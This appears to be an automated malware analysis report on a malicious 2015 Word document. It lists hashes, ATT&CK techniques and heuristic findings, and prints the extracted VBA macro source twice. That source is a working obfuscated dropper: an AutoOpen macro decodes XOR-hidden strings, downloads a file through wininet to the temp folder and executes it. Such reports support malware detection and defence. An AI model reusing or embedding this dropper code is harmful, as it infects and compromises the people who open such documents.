Office (OLE) malware analysis — malicious · 7ac6d989c14097f9

MALICIOUS

Office (OLE)

55.0 KB Created: 2015-01-19 16:07:00 Authoring application: Microsoft Office Word First seen: 2015-04-05

MD5: be545eab87f1196e803512f07804ae32 SHA-1: f68ebb200512ad117548961296aeb08012b9bc66 SHA-256: 7ac6d989c14097f9edc5d8f46e0db43b24bacf91a6d24cbbd61832c0cbba3be8

150 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros, including an autoopen macro, and a CreateObject call. The presence of these elements strongly suggests the document is designed to execute malicious code upon opening. The ClamAV detection 'Doc.Dropper.Agent-1822060' further supports this, indicating a dropper functionality.

Heuristics 6

ClamAV: Doc.Dropper.Agent-1822060 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-1822060
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set X111 = CreateObject _
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6714 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6714 bytes
SHA-256: `70ef0f5d2451e54afeb3d9a914209e3823072a970d09de3f41ca437709720438`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() HLOPHLOP32 End Sub Attribute VB_Name = "Module4" Attribute VB_Name = "Module11" Attribute VB_Name = "Module1" ' (File name: AddNewSheet.bas) ' Author: SENOO, Ken ' LICENSE: CC0 ' (Last update: 2015-03-10T18:38+09:00) Sub AddNewSheet(sheet_name) ' ????????????????? For Each ws In Worksheets If ws.Name = sheet_name Then Application.DisplayAlerts = False ws.Delete Application.DisplayAlerts = True End If Next ws ' ???????????? Sheets.Add(After:=ActiveSheet).Name = sheet_name End Sub Attribute VB_Name = "UFO" Attribute VB_Base = "0{76386A8F-C9E8-48DE-9528-E9D985F200EC}{08F64BDA-E7F3-4AB3-8C69-EABBF9CFCD70}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Class1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module3" Option Explicit Private Const API333333 = 8162 Private Const API33333 As String = "API33333" Private Const API3333 = 1 Private Const API333 = &H4000000 Public Function API22222(ByVal sURL As String, ByVal sFileName As String) As Boolean #If VBA7 And Win64 Then Dim API2222 As LongPtr, API3333333 As LongPtr #Else Dim API2222 As Long, API3333333 As Long #End If Dim API2 As Long Dim API222 As String * API333333, API33333333 As String Dim API22 As Integer, dData As Double API2222 = API22222222(API33333, API3333, vbNullString, vbNullString, 0) If API2222 = 0 Then Exit Function End If API3333333 = API222222(API2222, sURL, vbNullString, 0, API333, 0) If API3333333 = 0 Then dData = 0 Else API2222222 API3333333, API222, API333333, API2 API33333333 = API222 Do While API2 <> 0 API2222222 API3333333, API222, API333333, API2 API33333333 = API33333333 + Mid(API222, 1, API2) Loop dData = Len(API33333333): API22 = FreeFile Open sFileName For Binary Access Write Lock Write As #API22 Put #API22, , API33333333: Close #API22 End If API222222222 API3333333 API222222222 API2222 API33333333 = "" If dData Then API22222 = True End If End Function Attribute VB_Name = "Module2" Attribute VB_Name = "Module5" Private Const X11111111 = "1E25282121630C3D3D21242E5246242223" Private Const X1111111 = "111D0C0120243E2E7F637863011C283528" Private Const X111111 = "2539393D77626229222A223F575B2863292862273E622F242363284B57" Private Const X11111 = "1E2E3F243D3924232A630B245F571E343E392820022F27282E39" Private Const X1111 = "MMMMMMMMMMMMM32" Sub HLOPHLOP32() '* NAPIDPAOJMXNH55 Dim T111111111111111 _ As Long For T111111111111111 = _ 3 To 10 If Not T111111111111111 = 14 _ Then Exit For Next T111111111111111 Dim X111 Set X111 = CreateObject _ (STOP7777777777 _ (X1111, X11111)) Dim X11 Const X11ID = 2 Dim T11111111111111 As Integer For T11111111111111 = 0 To 0 If T11111111111111 = 5 Then End Next T11111111111111 Set X11 = X111.GetSpecialFolder _ (X11ID) Dim T1111111111111 As Integer For T1111111111111 = 0 To 0 If T1111111111111 = 5 Then End Next T1111111111111 X1 = X11 & STOP7777777777 _ (X1111, X1111111) Dim T111111111111 As Integer For T111111111111 = 0 To 0 If T111111111111 = 5 Then End Next T111111111111 Set X111 = CreateObject _ (STOP7777777777 _ (X1111, X11111)) Dim T11111111111 As Integer For T11111111111 = 0 To 0 If T11111111111 = 5 Then End Next T11111111111 If X111.FileExists _ (X1) Then X111. _ DeleteFile X1 End If If API22222(STOP7777777777 _ (X1111, X111111), X1) Then End If Set SSSS = Nothing If X111. _ FileExists _ (X1) Then End If Set SASASA = CreateObject _ (STOP7777777777 _ (X1111, X11111111)) SASASA.Open X1 End Sub Attribute VB_Name = "Module6" Option Explicit #If VBA7 And Win64 Then Public Declare PtrSafe Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long Public Declare PtrSafe Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr Public Declare PtrSafe Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As LongPtr, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Public Declare PtrSafe Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr #Else Public Declare Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long Public Declare Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long Public Declare Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As Long, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Public Declare Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long #End If Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String Dim asasas1 As Long Dim asasas1O As String Dim asasas10 As Integer Dim asasas101 As Integer For asasas1 = 1 To (Len(STOP77777777) / 2) asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2))) asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1)) asasas1O = asasas1O + Chr(asasas10 Xor asasas101) Next asasas1 STOP7777777777 = asasas1O End Function

SHA-256: 70ef0f5d2451e54afeb3d9a914209e3823072a970d09de3f41ca437709720438

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
HLOPHLOP32
End Sub

Attribute VB_Name = "Module4"


Attribute VB_Name = "Module11"

Attribute VB_Name = "Module1"
' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' LICENSE: CC0
' (Last update: 2015-03-10T18:38+09:00)

Sub AddNewSheet(sheet_name)

' ?????????????????
For Each ws In Worksheets
  If ws.Name = sheet_name Then
    Application.DisplayAlerts = False
    ws.Delete
    Application.DisplayAlerts = True
  End If
Next ws

' ????????????
Sheets.Add(After:=ActiveSheet).Name = sheet_name

End Sub

Attribute VB_Name = "UFO"
Attribute VB_Base = "0{76386A8F-C9E8-48DE-9528-E9D985F200EC}{08F64BDA-E7F3-4AB3-8C69-EABBF9CFCD70}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module3"
Option Explicit


Private Const API333333 = 8162
Private Const API33333 As String = "API33333"
Private Const API3333 = 1
Private Const API333 = &H4000000
Public Function API22222(ByVal sURL As String, ByVal sFileName As String) As Boolean
    #If VBA7 And Win64 Then
        Dim API2222 As LongPtr, API3333333 As LongPtr
    #Else
        Dim API2222 As Long, API3333333 As Long
    #End If
    Dim API2 As Long
    Dim API222 As String * API333333, API33333333 As String
    Dim API22 As Integer, dData As Double
    API2222 = API22222222(API33333, API3333, vbNullString, vbNullString, 0)
    If API2222 = 0 Then
        Exit Function
    End If
    API3333333 = API222222(API2222, sURL, vbNullString, 0, API333, 0)
    If API3333333 = 0 Then
        dData = 0
    Else
        API2222222 API3333333, API222, API333333, API2
        API33333333 = API222
        Do While API2 <> 0
            API2222222 API3333333, API222, API333333, API2
            API33333333 = API33333333 + Mid(API222, 1, API2)
        Loop
        dData = Len(API33333333): API22 = FreeFile
        Open sFileName For Binary Access Write Lock Write As #API22
        Put #API22, , API33333333: Close #API22
    End If
    API222222222 API3333333
    API222222222 API2222
    API33333333 = ""
    If dData Then
        API22222 = True
    End If
End Function

Attribute VB_Name = "Module2"

Attribute VB_Name = "Module5"
Private Const X11111111 = "1E25282121630C3D3D21242E5246242223"
Private Const X1111111 = "111D0C0120243E2E7F637863011C283528"
Private Const X111111 = "2539393D77626229222A223F575B2863292862273E622F242363284B57"
Private Const X11111 = "1E2E3F243D3924232A630B245F571E343E392820022F27282E39"
Private Const X1111 = "MMMMMMMMMMMMM32"






Sub HLOPHLOP32()
'* NAPIDPAOJMXNH55
Dim T111111111111111 _
As Long
For T111111111111111 = _
3 To 10
If Not T111111111111111 = 14 _
Then Exit For
Next T111111111111111
Dim X111
Set X111 = CreateObject _
(STOP7777777777 _
(X1111, X11111))
Dim X11
Const X11ID = 2
Dim T11111111111111 As Integer
For T11111111111111 = 0 To 0
If T11111111111111 = 5 Then End
Next T11111111111111
Set X11 = X111.GetSpecialFolder _
(X11ID)
Dim T1111111111111 As Integer
For T1111111111111 = 0 To 0
If T1111111111111 = 5 Then End
Next T1111111111111
X1 = X11 & STOP7777777777 _
(X1111, X1111111)
Dim T111111111111 As Integer
For T111111111111 = 0 To 0
If T111111111111 = 5 Then End
Next T111111111111
Set X111 = CreateObject _
(STOP7777777777 _
(X1111, X11111))
Dim T11111111111 As Integer
For T11111111111 = 0 To 0
If T11111111111 = 5 Then End
Next T11111111111
If X111.FileExists _
(X1) Then
X111. _
DeleteFile X1
End If
If API22222(STOP7777777777 _
(X1111, X111111), X1) Then
End If
Set SSSS = Nothing
If X111. _
FileExists _
(X1) Then
End If
Set SASASA = CreateObject _
(STOP7777777777 _
(X1111, X11111111))
SASASA.Open X1
End Sub







Attribute VB_Name = "Module6"
Option Explicit

#If VBA7 And Win64 Then
Public Declare PtrSafe Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As LongPtr, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As Long, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If


Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
    Dim asasas1 As Long
    Dim asasas1O As String
    Dim asasas10 As Integer
    Dim asasas101 As Integer
    For asasas1 = 1 To (Len(STOP77777777) / 2)
        asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
        asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
        asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
    Next asasas1
   STOP7777777777 = asasas1O
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.